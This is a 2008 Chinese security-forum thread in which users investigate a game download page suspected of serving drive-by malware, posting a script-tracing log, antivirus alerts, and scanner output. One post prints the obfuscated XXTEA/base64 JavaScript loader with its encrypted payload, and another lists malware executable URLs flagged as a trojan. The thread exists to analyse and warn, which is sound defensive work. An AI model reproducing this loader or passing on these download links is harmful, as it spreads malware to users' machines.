可疑网址

tracydk

似乎有毒 想来下寂静岭3的

PS:奇怪了，BTCHINA上的寂静岭3不能玩


http://download.tkgame.com/down/pcgame/act/2006-07-14/545.html

change_018

卡巴进去没什么反应

几百M的寂静岭是试玩版的
正式的寂静岭3起码2个G左右 我下过

ahzsmzkf

小a 果然报了

molicn

我来看看 挂马
Log is generated by FreShow.
[wide]http://download.tkgame.com/down/pcgame/act/2006-07-14/545.html
    [script]http://bbs1.tkgame.com/js/dvbbs.js
    [script]http://download.tkgame.com/img/nav_over.js
       [frame]http://gggggre.cn/007/zz.htm
            [frame]http://gggggre.cn/007/123.htm
            [script]http://js.users.51.la/2134416.js
    [script]http://www3.tkgame.com/JS/download_01_680x60.js
    [script]http://download.tkgame.com/e/public/ViewClick?classid=110&id=545
    [script]http://www3.tkgame.com/JS/download_04_230x210.js
    [script]http://download.tkgame.com/e/public/onclick?enews=donews&classid=110&id=545
    [script]http://tkbd1.tkgame.com/count/mystat.asp?siteid=6

这段我不会解

function utf8to16(str){var out,i,len,c;var char2,char3;out=[];len=str.length;i=0;while(i<len){c=str.charCodeAt(i++);switch(c>>4){case 0:case 1:case 2:case 3:case 4:case 5:case 6:case 7:out[out.length]=str.charAt(i-1);break;case 12:case 13:char2=str.charCodeAt(i++);out[out.length]=String.fromCharCode(((c&0x1F)<<6)|(char2&0x3F));break;case 14:char2=str.charCodeAt(i++);char3=str.charCodeAt(i++);out[out.length]=String.fromCharCode(((c&0x0F)<<12)|((char2&0x3F)<<6)|((char3&0x3F)<<0));break}}return out.join('')}var base64DecodeChars=new Array(-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,-1,62,-1,-1,-1,63,52,53,54,55,56,57,58,59,60,61,-1,-1,-1,-1,-1,-1,-1,0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,-1,-1,-1,-1,-1,-1,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,-1,-1,-1,-1,-1);function base64decode(str){var c1,c2,c3,c4;var i,len,out;len=str.length;i=0;out="";while(i<len){do{c1=base64DecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c1==-1);if(c1==-1)break;do{c2=base64DecodeChars[str.charCodeAt(i++)&0xff]}while(i<len&&c2==-1);if(c2==-1)break;out+=String.fromCharCode((c1<<2)|((c2&0x30)>>4));do{c3=str.charCodeAt(i++)&0xff;if(c3==61)return out;c3=base64DecodeChars[c3]}while(i<len&&c3==-1);if(c3==-1)break;out+=String.fromCharCode(((c2&0XF)<<4)|((c3&0x3C)>>2));do{c4=str.charCodeAt(i++)&0xff;if(c4==61)return out;c4=base64DecodeChars[c4]}while(i<len&&c4==-1);if(c4==-1)break;out+=String.fromCharCode(((c3&0x03)<<6)|c4)}return out}function long2str(v,w){var vl=v.length;var sl=v[vl-1]&0xffffffff;for(var i=0;i<vl;i++){v=String.fromCharCode(v&0xff,v>>>8&0xff,v>>>16&0xff,v>>>24&0xff)}if(w){return v.join('').substring(0,sl)}else{return v.join('')}}function str2long(s,w){var len=s.length;var v=[];for(var i=0;i<len;i+=4){v[i>>2]=s.charCodeAt(i)|s.charCodeAt(i+1)<<8|s.charCodeAt(i+2)<<16|s.charCodeAt(i+3)<<24}if(w){v[v.length]=len}return v}function xxtea_decrypt(str,key){if(str==""){return""}var v=str2long(str,false);var k=str2long(key,false);var n=v.length-1;var z=v[n-1],y=v[0],delta=0x9E3779B9;var mx,e,q=Math.floor(6+52/(n+1)),sum=q*delta&0xffffffff;while(sum!=0){e=sum>>>2&3;for(var p=n;p>0;p--){z=v[p-1];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[p]=v[p]-mx&0xffffffff}z=v[n];mx=(z>>>5^y<<2)+(y>>>3^z<<4)^(sum^y)+(k[p&3^e]^z);y=v[0]=v[0]-mx&0xffffffff;sum=sum-delta&0xffffffff}return long2str(v,true)}t="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";t=utf8to16(xxtea_decrypt(base64decode(t),'7a'));document.write(t);

[ 本帖最后由 molicn 于 2008-9-20 22:38 编辑 ]

tracydk

把东西发上来

tracydk

晚上没人啊

shmily512099

进去后 微点告诉我

蠕虫名称:Worm.Win32.AutoRun.gki

程序:
F:\TEMPORARY INTERNET FILES\CONTENT.IE5\NQ87F10P\0001[1].EXE
是蠕虫程序!
已成功阻止其运行,是否要删除此文件?

蠕虫名称:Worm.Win32.AutoRun.gki

程序:
C:\DOCUMENTS AND SETTINGS\LOLITA\LOCAL SETTINGS\TEMP\IOS.EXE
是蠕虫程序!
已成功阻止其运行,是否要删除此文件?

woai_jolin

Checking: http://download.tkgame.com/down/pcgame/act/2006-07-14/545.html
Engine version: 4.44.0.9170
File size: 16.08 KB

http://download.tkgame.com/down/pcgame/act/2006-07-14/545.html - Ok

Checking: http://download.tkgame.com/img/nav_over.js
File size: 1336 bytes

http://download.tkgame.com/img/nav_over.js - Ok

Checking: http://download.tkgame.com/e/pub ... ssid=110&id=545
File size: 0 bytes

http://download.tkgame.com/e/pub ... ssid=110&id=545 - the size of the file is equal to zero, skipped

Checking: http://www3.tkgame.com/JS/download_04_230x210.js
File size: 234 bytes

http://www3.tkgame.com/JS/download_04_230x210.js - Ok

Checking: http://download.tkgame.com/e/pub ... ssid=110&id=545
File size: 23 bytes

http://download.tkgame.com/e/pub ... ssid=110&id=545 - Ok

Checking: http://www3.tkgame.com/JS/download_01_680x60.js
File size: 231 bytes

http://www3.tkgame.com/JS/download_01_680x60.js - Ok

Checking: http://bbs1.tkgame.com/js/dvbbs.js
File size: 121 bytes

http://bbs1.tkgame.com/js/dvbbs.js - Ok

Checking: http://tkbd1.tkgame.com/count/mystat.asp?siteid=6
File size: 689 bytes

http://tkbd1.tkgame.com/count/mystat.asp?siteid=6 - Ok

granthill

http://gggggre.cn/0001.exe


avast!    Win32:Agent-SIM [Trj]

http://www.net-ddos.com/youxi/shengji.exe
http://www.net-ddos.com/youxi/weiai.exe
http://www.net-ddos.com/youxi/zj.exe

[ 本帖最后由 granthill 于 2008-9-21 11:05 编辑 ]

20080808

小红伞报了